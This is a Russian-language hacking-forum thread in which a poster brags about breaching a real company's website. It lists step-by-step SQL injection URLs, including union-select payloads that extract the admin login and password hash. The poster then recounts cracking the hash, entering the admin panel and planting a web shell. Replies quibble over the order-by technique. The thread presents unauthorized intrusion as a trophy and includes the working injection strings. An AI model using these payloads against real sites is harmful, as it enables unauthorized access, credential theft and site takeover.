Форум АНТИЧАТ - Новогодний взлом!

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Новогодний взлом! (https://forum.antichat.xyz/showthread.php?t=56603)

Новогодний взлом!

Короче дело было на днях. Пришел с работы и полез в сеть. Искал юизби винт (подарок другу). И попал на сайт одной известной конторы в моем любимом городе.
Название не буду называть дабы не вызывать интереса юного скрипт-кидиса. Можно добавить, что фирма, где я работаю постоянно обращ. к ним за комплект..
Кликнул на Продукция и попал в меню выбора продукции, но тут мое внимание удалилось в строку браузера.

Код:

http://comp.com/x.php?ProdID=916

Ну и типично я решил проверить на скуль. Поставил заветную кавычку и получил скуль, правда без каких либо ошибок.

Далее

Код:

http://comp.com/x.php?ProdID=916+order+by+1,2,3,4,5/*

Затем возник проблемс , который был решен

Код:

http://comp.com/x.php?ProdID=-916+union+select+1,2,3,4,5/*

Ничего что надо не вывело, ну сразу нашел выход

Код:

http://comp.com/x.php?ProdID=916+and+1=0+union+select+1,2,3,4,5,6/*

Версия мускула была 4 . Осталось подобрать таблиц и вывести заветный пасс админа, т.к . админка уже была найдена.
Хочу добавить, что данный скрипт был написан очень якобы крутой и дорогой конторой за неплохие деньги как потом выяснилось!!!!))))))))))))))

Но при подборе вышел небольшой обломс. Я решил забить, решил стукнуть за помощью на ачат, но прошелся лесов, кста привет и спасибо Termin@L за поддержку.

Сутки прошли, но результатов 0% даже после прогона по словарю предпол. таблиц.

Дальше самое интересно!! Решил зайти в админку, ввел типично admin:admin прошелся в тундру, но решил проверить html код страницы :

Код:

  <td class=TableRow1 align=right><input type="text" class=txt name="AdminName" value=""></td>

 </tr>

 <tr>

  <td class=TableRow1>Пароль:</td>

  <td class=TableRow1 align=right><input type="password" class=txt name="AdminPWD"></td>

 </tr>

 <tr>



  <td class=TableRow1 colspan="2" align=right><hr size=1><input type="submit" class=but value="Войти"></td>

И что остается только хлопать ушами от радости
AdminPWD--- таблица с паролем админа, ну и аналогично AdminName-- его логин.

Запрос выглядел след. образом:

Код:

http://comp.com/x.php?ProdID=916+and+1=0+union+select+1,name,3,password,5,6+from+AdminPWD+limit+0,1/*

ПОлучил des пароль. После подбора успешно залогонился в админку , были траблы с заливом шелла , но затем вопрос был решен.

Поздравляю все С НОВЫМ ГОДОМ. Мемберы ачата здоровья вам , меньше мазалей на заднице и успешных тем!!!!!

А что прости, тут необычного?

Не обычное не стал описывать ибо уже УКА!!!!_)

Типичная sql инъекция, для этого сущствует специальная тема. А вот что касается этого, то это меня вообще убило, делаем то сами не зная что:

Цитата:

Сообщение от fly

Код:

http://comp.com/x.php?ProdID=916+order+by+1,2,3,4,5/*

"Замечательно."

и чем это тебя убило?

fly, а ты вобще понимаешь назначение такой вот конструкции, проще http://comp.com/x.php?ProdID=916+order+by+5/*

и вобще я всегда говорил, что получать кол-во столбцов лучше с реально существующим параметром, т.е. не -916, а 916

Цитата:

Название не буду называть дабы не вызывать интереса юного скрипт-кидиса

улыбнуло

Умняги хватит флейм разводить.)))

Код:

Типичная sql инъекция, для этого сущствует специальная тема. А вот что касается этого, то это меня вообще убило, делаем то сами не зная что:

Типично опеч.

Код:

http://comp.com/x.php?ProdID=916+order+by+5/*

1) Что меня убило, ну к примеру то что ты до сих пор не понимаешь конструкцию order by зачем делать сортировку сначала по первому потом по второму потом по третьему и т.д. столбцу? какой смысл?

Если бы ты юзал нормально order+by+n - отсортировать по n-ому столбцу то хоть времени бы меньше затратил. Но чувствуется раз ты не понимаешь этого, то не разбираешся в синтаксисе sql и следовательно вся твоя работа тупая подстановка "чего то там" в параметры на подобие id и т.д печально.

2) Что в этой теме такого что она должна быть отдельной?

флай не тупи,тебе же сказали в чем ты ошибся